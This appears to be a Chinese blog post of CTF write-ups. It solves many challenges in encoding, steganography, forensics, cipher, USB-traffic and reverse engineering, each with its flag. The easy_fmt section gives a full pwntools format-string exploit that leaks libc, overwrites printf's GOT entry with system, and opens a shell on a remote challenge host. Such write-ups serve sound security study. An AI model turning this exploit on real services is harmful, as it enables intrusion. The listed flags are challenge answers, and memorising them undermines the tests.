1.编码编码

base64解码即可得到flag!

upload successful

flag:welcometothepilotcup

2.取证分析

upload successful

利用脚本得到flag.png,用winhex删除开头多余数据,png文件头为89 50 开头

upload successful

结尾是AE 42 60 82

去除掉无用信息,得到flag,b91011fc

3.stegano l

打开查看源码,得到flag就是passwd:后面字符 steganoI

upload successful

flag:steganol

4.stegano

binwalk查看文件

upload successful

foremost分离文件

upload successful

得到flag

upload successful

flag:EORDFFOMFPMA

5.lsb

用StegSolve打开图片,调制Red pane 3 即可得到flag

upload successful

flag:ONPGRAMBCICM

6.恢复与解密

下载附件,将其中的xty.img使用Diskgenius打开.

选择恢复文件

upload successful

打开其中的INode00000010,可以看到密文 aWdxNDs3NDFSOzFpa1I1MWliT08waWdx

使用脚本对密文进行解密

import string

from base64 import *

b=b64decode("aWdxNDs3NDFSOzFpa1I1MWliT08waWdx")

data=list(b)

for k in range(0,200):

    key=""

    for i in range(len(data)):

        key+=chr(ord(data[i])^k)

    print (key)

结果中没有特殊符号的则是flag

flag:jdr78472Q82jhQ62jaLL3jdr

7.文件提取

下载附件,使用记事本打开flag.exe.将其中的base64编码转换成图片

upload successful

用记事本打开图片,可以在图片的最后看到flag

flag{068EEF6A7BAD3FDF}

8.凯撒1

使用凯撒密码转换密文.

upload successful

最后一个单词是flag

flag:moconlfpeold

9.凯撒2

payload:

a = "0B 33 33 28 20 2E 33 26 70 20 3D 33 39 20 37 33 30 3A 29 28 20 33 32 29 20 31 33 36 29 20 27 2C 25 30 30 29 32 2B 29 20 2D 32 20 3D 33 39 36 20 2E 33 39 36 32 29 3D 72 20 18 2C 2D 37 20 33 32 29 20 3B 25 37 20 2A 25 2D 36 30 3D 20 29 25 37 3D 20 38 33 20 27 36 25 27 2F 72 20 1B 25 37 32 6B 38 20 2D 38 03 20 75 76 7C 20 2F 29 3D 37 20 2D 37 20 25 20 35 39 2D 38 29 20 37 31 25 30 30 20 2F 29 3D 37 34 25 27 29 70 20 37 33 20 2D 38 20 37 2C 33 39 30 28 32 6B 38 20 2C 25 3A 29 20 38 25 2F 29 32 20 3D 33 39 20 38 33 33 20 30 33 32 2B 20 38 33 20 28 29 27 36 3D 34 38 20 38 2C 2D 37 20 31 29 37 37 25 2B 29 72 20 1B 29 30 30 20 28 33 32 29 70 20 3D 33 39 36 20 37 33 30 39 38 2D 33 32 20 2D 37 20 31 25 37 37 32 34 2A 33 25 37 26 37 72"

ls = []

for i in a.split(' '):

    ls.append(int(i, 16))

print(ls)

for i in range(-100, 100):

    try:

        for j in ls:

            print(chr(j+i), end='')

        print()

    except:
        pass

得到flag如图中阴影

upload successful

10.ascii

>>> l=[84,104,101,32,115,111,108,117,116,105,111,110,32,105,115,58,32,105,104,98,100,115,105,101,111, 112,100,99,110]

>>> a=''

>>> for i in l:

...  a+=chr(i)

...

>>> a

'The solution is: ihbdsieopdcn'

flag:ihbdsieopdcn

11.forensics

binwalk查看文件

upload successful

foremost分离文件

查看有用信息得到图片就是flag

upload successful

flag:360HA360

12.usb

发现是usb协议的流量分析然后找到了罗技

upload successful

然后我们查看数据发现代表着鼠标的移动,导出数据到a.txt

00: ff :00:00

00: ff :00:00

00: ff :00:00

00: fd: 00: 00

00: ff :00:00

00: ff :00:00

00: fe: ff :00

00: fd: 00:00

00: fb:00: 00

00: fc :00:00

00: fb:00:00

00: fc :00:00

00: fc: ff :00

00: fe: 00: 00

00:fe:ff:00

00: fe:00:00

00: ff :00: 00

00: fe:ff :00

00: ff: ff :00

01 :00: 00:00

然后我们转换坐标

awk -F: ‘function comp(v){if(v>127)v-=256;return v}{x+=comp(strtonum(“0x”$2));y+=comp(strtonum(“0x”$3))}$1==”01”{print x,y}’ a.txt > b.txt

得到坐标后用gnuplot画出flag即可

flag为tHe_CAT_is_the_CULpRiT

14.MasterofZip-Middle

爆破得到password!

upload successful

得到伪加密的包用winhex修改为00

得到flag.png用winhex审计后发现高度不够

我们调整高度后最终得到flag

upload successful

flag{b2599e17dd7c48ae62d008a1a145cc6d9928d4ac}

15.数据包分析-Easy

导出HTTP所有文件

upload successful

得到flag.php,即flag

flag{3eyufhnj87}

16.easyelf

angr求解即可

upload successful

flag{Thunk_c0des_xoR_thr3e_de4l}

22.giao

payload:

upload successful

即可得到flag{5f284498df}

23.easy_fmt

from pwn import *

context.log_level = 'debug'

p = process('./easy_fmt')

e = ELF('./easy_fmt')

libc=ELF("/libc64.so")

p=remote("39.104.173.175","15502")

get_libc_payload = "%7$s".ljust(8, 'a')+p64(e.got['read'])

p.send(get_libc_payload)

read_libc = u64(p.recv(6)+'\x00\x00')

print hex(read_libc)

begin_libc = read_libc-libc.symbols['read']

print hex(begin_libc)

one_gadget_libc = begin_libc+libc.symbols['system']

print hex(one_gadget_libc)

a1 = (one_gadget_libc & 0xff0000) >> 16

a2 = (one_gadget_libc & 0xff00) >> 8

a3 = one_gadget_libc & 0xff

print hex(a1)+hex(a2)+hex(a3)

point1 = [2, a1]

point2 = [1, a2]

point3 = [0, a3]


def swap(p1, p2):

    for i in range(2):

        t = p1[i]

        p1[i] = p2[i]

        p2[i] = t


if a1 > a2:

    swap(point1, point2)

if a1 > a3:

    swap(point1, point3)

if a2 > a3:

    swap(point2, point3)

print point1+point2+point3

point2[1] = point2[1]-point1[1]

point3[1] = point3[1]-point2[1]-point1[1]

print point1+point2+point3

write_got_payload = '%'+str(point1[1])+'c'+'%12$hhn'

write_got_payload += '%'+str(point2[1])+'c'+'%13$hhn'

write_got_payload += '%'+str(point3[1])+'c'+'%14$hhn'

write_got_payload = write_got_payload.ljust(48, 'a')

write_got_payload += p64(e.got['printf']+point1[0])

write_got_payload += p64(e.got['printf']+point2[0])

write_got_payload += p64(e.got['printf']+point3[0])

p.send(write_got_payload)

sleep(1)

p.sendline("/bin/sh\x00")

p.interactive()

得到flag{279920429c}

24.EasyRE

upload successful

flag{Let_Us_st4rt_R3v3rSe}

25.EASYReverse

ida查看程序,发现是个没有查表的base64,遂用脚本分离出了前一部分

upload successful

最后三个字节手动拼凑得到正确flag

flag{JSe3psfxa2X96USgM58346t4Ta87uRQy}



CTF      wp

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!